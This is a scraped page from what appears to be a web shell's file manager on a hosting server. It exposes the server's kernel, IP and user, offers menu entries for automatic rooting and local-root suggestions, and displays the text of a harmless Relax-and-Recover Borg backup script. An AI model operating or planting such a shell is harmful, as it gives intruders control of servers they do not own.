Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.217.87
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
prep /
BORG /
default /
Delete
Unzip
Name
Size
Permission
Date
Action
100_set_vars.sh
886
B
-rw-r--r--
2026-04-01 09:39
200_prep_borg.sh
1.18
KB
-rw-r--r--
2026-04-01 09:39
250_mount_usb.sh
517
B
-rw-r--r--
2026-04-01 09:39
300_init_archive.sh
2.74
KB
-rw-r--r--
2026-04-01 09:39
Save
Rename
# This file is part of Relax-and-Recover, licensed under the GNU General # Public License. Refer to the included COPYING for full text of license. # # 200_prep_borg.sh # Check if BORGBACKUP_ARCHIVE_PREFIX is correctly set. # Using '_' could result to some unpleasant side effects, # as this character is used as delimiter in latter `for' loop ... # Excluding other non alphanumeric characters is not really necessary, # however it looks safer to me. # I'm sure archive handling can be done better, but no time for it now ... if [[ $BORGBACKUP_ARCHIVE_PREFIX =~ [^a-zA-Z0-9] ]] \ || [[ -z $BORGBACKUP_ARCHIVE_PREFIX ]]; then Error "BORGBACKUP_ARCHIVE_PREFIX must be alphanumeric non-empty value only" fi # Create our own locales, used only for Borg restore. mkdir -p "$ROOTFS_DIR/usr/lib/locale" localedef -f UTF-8 -i en_US "$ROOTFS_DIR/usr/lib/locale/en_US.UTF-8" StopIfError "Could not create locales" # Activate $COPY_AS_IS_BORG from default.conf. COPY_AS_IS+=( "${COPY_AS_IS_BORG[@]}" ) # Activate $PROGS_BORG from default.conf. # Avoid user to accidentally override `borg' and `locale' and exclude them # from Relax-and-Recover rescue/recovery system. PROGS+=( "${PROGS_BORG[@]}" borg locale )